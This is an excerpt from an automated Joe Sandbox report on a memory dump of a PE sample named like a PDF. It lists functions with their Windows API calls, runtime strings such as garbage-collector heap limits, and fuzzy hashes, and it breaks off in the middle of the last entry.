Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb30b39f17189cc207766a06fafd0193f1968a66c5300b95dceb746ee46faf1
Instruction ID: 11286cf44e6000a829ced2a265bec3f69df145586d520c4720185b8b79d31261
Opcode Fuzzy Hash: acb30b39f17189cc207766a06fafd0193f1968a66c5300b95dceb746ee46faf1
Instruction Fuzzy Hash: AF11C463B0564285EA10BE22B8811BDD751AF997D5FC8D532DF0C4BB85DE3CD4928350

Function 00007FF7D78E3020 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc32c287874e7cca53342f15f3be9d7b8587babf6447c712c979b2a51d28d1ab
Instruction ID: 1d6540be851c052c861db279eaf019ff609fe9e323836763cb2961ac94514817
Opcode Fuzzy Hash: dc32c287874e7cca53342f15f3be9d7b8587babf6447c712c979b2a51d28d1ab
Instruction Fuzzy Hash: F2113391F1950755E918BF26DCA10FDE6211F59780FD42437E81E4B3A3EE1CE8238360

Function 00007FF7D78E28C0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1578164cf70dab00a07bac1665d68777a802a9af90cb840f7509a4b8d0982a06
Instruction ID: ab3594f1b80e89751305dd0a5f289bf674d397cba469863844c8637f088cdadb
Opcode Fuzzy Hash: 1578164cf70dab00a07bac1665d68777a802a9af90cb840f7509a4b8d0982a06
Instruction Fuzzy Hash: 95018195F1940B94FA08BB729C6A1FED6215F99341FD45837E81D0B793ED1CE4274360

Function 00007FF7D78E2FB0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d1caf96c6e372fb1af8059f4be2bd177a62ee4a662ad31da86eb1967ca7590
Instruction ID: 8b3e01f7c76e6b9f75b71d106369d0d231f0e291ea3c4a6cc262cafe17a482e0
Opcode Fuzzy Hash: 41d1caf96c6e372fb1af8059f4be2bd177a62ee4a662ad31da86eb1967ca7590
Instruction Fuzzy Hash: 4BF01C90F1840B54F908BF26DCA50FDEA211F59B84FD82433E91D5B762ED1CE4274360

Function 00007FF7D78E2F60 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dadf284ed3b89edd7da16d478fd7699b0cc0489388b785b3969d47c75075d49
Instruction ID: 0e72b095ddbc0443e0407212f9fd5d975b1bfe3a9fd58424d0aab90d6f4aa743
Opcode Fuzzy Hash: 6dadf284ed3b89edd7da16d478fd7699b0cc0489388b785b3969d47c75075d49
Instruction Fuzzy Hash: E2E0EC94E1804784E908BF2698A61BDD6211F5E740FD42433E82D5A793ED1CE4238360

Function 00007FF7D7851EF0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675ecb6d10922ef899dc276de7e602d6f7aeb1c2852c079b73f0942e993b1f76
Instruction ID: a765fe44678b0faaa6fabaa8a488578e02d3a598532b14a06d139b6380c9a421
Opcode Fuzzy Hash: 675ecb6d10922ef899dc276de7e602d6f7aeb1c2852c079b73f0942e993b1f76
Instruction Fuzzy Hash: 0CF08251E1800784E948BF2588611BCE2312F1A340FC42437D92D17292ED0CE0238375

Function 00007FF7D785C9D0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CA0E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CA36
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CA56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CA76
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CA96
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CABA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CADE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7D7863197,?,?,?,?,00007FF7D785C045), ref: 00007FF7D785CB02

Strings

GCHeapHardLimitPercent, xrefs: 00007FF7D785CA2C
GCHeapHardLimitLOH, xrefs: 00007FF7D785CA6C
GCHeapHardLimitPOH, xrefs: 00007FF7D785CA8C
GCHeapHardLimitPOHPercent, xrefs: 00007FF7D785CAF8
GCHeapHardLimit, xrefs: 00007FF7D785CA07
GCHeapHardLimitLOHPercent, xrefs: 00007FF7D785CAD4
GCHeapHardLimitSOHPercent, xrefs: 00007FF7D785CAB0
GCHeapHardLimitSOH, xrefs: 00007FF7D785CA4C

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
API String ID: 1004003707-945519297
Opcode ID: 53d76cf99351b4f06dce9e5c8b241ae12e9d78257ed22f94140043e99c61667b
Instruction ID: 2afade932739f7fa246a56e8a86157e09162cad8111e5c15dbf53ab901925668
Opcode Fuzzy Hash: 53d76cf99351b4f06dce9e5c8b241ae12e9d78257ed22f94140043e99c61667b
Instruction Fuzzy Hash: 2C415960A0CA4380EA05BB1AA94097DDA616F817F4FC45333DD3C676E5EF2CE8278720

Function 00007FF7D785BBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BBD3
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BBE8
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BBF5
InitializeContext.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BC33
GetLastError.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BC41
InitializeContext.KERNEL32(?,?,?,?,?,00007FF7D78557E7), ref: 00007FF7D785BC95

Strings

InitializeContext2, xrefs: 00007FF7D785BBDE
kernel32.dll, xrefs: 00007FF7D785BBCC

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: d2046c5e0ac1c8118e530c264c01a168ed6a43e0911aed0ab49f953eb1266eb4
Instruction ID: 55cdfa2fff311ee8109e7781a99e5b8061f7efa0a028c2a2e4e39b9c76790755
Opcode Fuzzy Hash: d2046c5e0ac1c8118e530c264c01a168ed6a43e0911aed0ab49f953eb1266eb4
Instruction Fuzzy Hash: 0D319C26A09B4782FA14AF55A44067DEBA0BF84BA0FC80436DD4D03764DF7CE997C724

Function 00007FF7D7855670 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF7D785BF31
GetProcAddress.KERNEL32 ref: 00007FF7D785BF41
GetLastError.KERNEL32 ref: 00007FF7D785BF94
SuspendThread.KERNEL32 ref: 00007FF7D785BFAD
GetThreadContext.KERNEL32 ref: 00007FF7D785BFC8
ResumeThread.KERNEL32 ref: 00007FF7D785BFF2

Strings

kernel32, xrefs: 00007FF7D785BF24
QueueUserAPC2, xrefs: 00007FF7D785BF3A

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
String ID: QueueUserAPC2$kernel32
API String ID: 3714266957-4022151419
Opcode ID: 3a26817427b23d23e194507123e79806580a0e07f40c8c2b944e4bdaf63f2336
Instruction ID: dc74147038c2cab96fbd8b7bc377d22d3dc5b48745ec294894f072cf75f2c032
Opcode Fuzzy Hash: 3a26817427b23d23e194507123e79806580a0e07f40c8c2b944e4bdaf63f2336
Instruction Fuzzy Hash: EB319221B08A4681FA54BB19F84077DABA1BF95BE4FC40232D92D476E4DF2DE4578B20

Function 00007FF7D7855A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D785BEA0: GetCurrentThreadId.KERNEL32 ref: 00007FF7D785BEA4

GetCurrentProcess.KERNEL32 ref: 00007FF7D7855A86
GetCurrentThread.KERNEL32 ref: 00007FF7D7855A8E
DuplicateHandle.KERNEL32 ref: 00007FF7D7855AB2

Part of subcall function 00007FF7D785D250: VirtualQuery.KERNEL32 ref: 00007FF7D785D282

RaiseFailFastException.KERNEL32 ref: 00007FF7D7855AE0

Strings

, xrefs: 00007FF7D7855AF4

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
Opcode ID: d7a24a8dd3ca13ff287bfab1edf6a04a8739b27513df6004b3879d76dc0aebf8
Instruction ID: 54f77f9be76c8bb619c8e7a22affdc6c25bba904e5f5a7dd25bd34410d850465
Opcode Fuzzy Hash: d7a24a8dd3ca13ff287bfab1edf6a04a8739b27513df6004b3879d76dc0aebf8
Instruction Fuzzy Hash: 6D118E72608B818AD760EF15B4411AEBB51FB457B4F94033AE6BD0BAD6CF38D0528700

Function 00007FF7D7886F60 Relevance: 7.6, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D788700E
LeaveCriticalSection.KERNEL32 ref: 00007FF7D7887054
EnterCriticalSection.KERNEL32 ref: 00007FF7D7887126
LeaveCriticalSection.KERNEL32 ref: 00007FF7D7887147
EnterCriticalSection.KERNEL32 ref: 00007FF7D788718F
LeaveCriticalSection.KERNEL32 ref: 00007FF7D78871B0

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ac766117bc8e4d1d133c8c692420a46583fe21517f771707e92b638207d441bf
Instruction ID: 6207d8f0e71f298500701ef3a801ffb0a225ad65f56474746dee771a0ae35408
Opcode Fuzzy Hash: ac766117bc8e4d1d133c8c692420a46583fe21517f771707e92b638207d441bf
Instruction Fuzzy Hash: E4615E31E09B8294EA54BB19F8817BDE7A4AB84780FE54033D98D46765DF3DE053C320

Function 00007FF7D7882280 Relevance: 7.6, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D788231A
LeaveCriticalSection.KERNEL32 ref: 00007FF7D788235F

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: cd76376ae519048b1a2f19defe069b20f109355a714e276bfeb472f9c2026b58
Instruction ID: 42c8697b8ad8930b4addfce48b90454c1b801a759ddd830f70586ba8caab9395
Opcode Fuzzy Hash: cd76376ae519048b1a2f19defe069b20f109355a714e276bfeb472f9c2026b58
Instruction Fuzzy Hash: DF513F3190DB8690EA64BB14F8917BDF7A4FB84780FD50037D98D46A65DF3DE0568720

Function 00007FF7D7853B40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF7D7853BE0
RaiseFailFastException.KERNEL32 ref: 00007FF7D7853CE9
RaiseFailFastException.KERNEL32 ref: 00007FF7D7853D26

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF7D7853BCA

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: 5caa0d5767ed251b4ce26230d2b5e415174ca47d067d979e30bbae2d3dc2c807
Instruction ID: 4ed7602d2ad6edea5af916ae92066d460957150f7068223bbf32dd29b1d60ee1
Opcode Fuzzy Hash: 5caa0d5767ed251b4ce26230d2b5e415174ca47d067d979e30bbae2d3dc2c807
Instruction Fuzzy Hash: B551BB21F09A4641EF54BB19D44077CAB91EF48B94FC59933DA1E47B90DF2DE8A78320

Function 00007FF7D7890DA0 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF7D786B779), ref: 00007FF7D7890E1B
SwitchToThread.KERNEL32(?,?,?,00007FF7D786B779), ref: 00007FF7D7890EC2
SwitchToThread.KERNEL32(?,?,?,00007FF7D786B779), ref: 00007FF7D7890ED8

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 43ee8ffcd74497041b997f05ddf4771273f5af2c4949ffce8967a67fbea23156
Instruction ID: 0c5659e5fe669f08e8e46289917db5b59835b602eb7918dad1b9b905231bf01b
Opcode Fuzzy Hash: 43ee8ffcd74497041b997f05ddf4771273f5af2c4949ffce8967a67fbea23156
Instruction Fuzzy Hash: C9418536B0968B85EB649E25D04063DFA50EB00B94FD4823BDA4E466C9DF3CF892C760

Function 00007FF7D787281B Relevance: 6.1, APIs: 4, Instructions: 108threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF7D78728A4
SwitchToThread.KERNEL32 ref: 00007FF7D7872A68
SwitchToThread.KERNEL32 ref: 00007FF7D7872B1E

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 659ebf3dd5d84d091ddf473b65f6eaf470cc314a3da710ee67d34b60691f6f3d
Instruction ID: 0dd020b1f8a79eeb5f24e4362d698dbb835dc7fd37a5f1d9ce2ea5edb845177d
Opcode Fuzzy Hash: 659ebf3dd5d84d091ddf473b65f6eaf470cc314a3da710ee67d34b60691f6f3d
Instruction Fuzzy Hash: 57415A31E0C14346F668BB695850A3DEBE0AF51364FD44237D59E8A2D2DE2CB8A3D731

Function 00007FF7D78916A0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,00007FF7D786EFE5,?,?,0000000100000001,00007FF7D787D278), ref: 00007FF7D7891779
DebugBreak.KERNEL32(?,?,?,00007FF7D786EFE5,?,?,0000000100000001,00007FF7D787D278), ref: 00007FF7D7891796
DebugBreak.KERNEL32(?,?,?,00007FF7D786EFE5,?,?,0000000100000001,00007FF7D787D278), ref: 00007FF7D78917B1
DebugBreak.KERNEL32(?,?,?,00007FF7D786EFE5,?,?,0000000100000001,00007FF7D787D278), ref: 00007FF7D78917CA

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: c6980aae1e4cbbc4440220d442a299caac1a64996a2fa9476b91f6dea4e9d173
Instruction ID: bf64603c9a0df14f2348a5c46082a97052b298f916489d6bff9d9c3d08271274
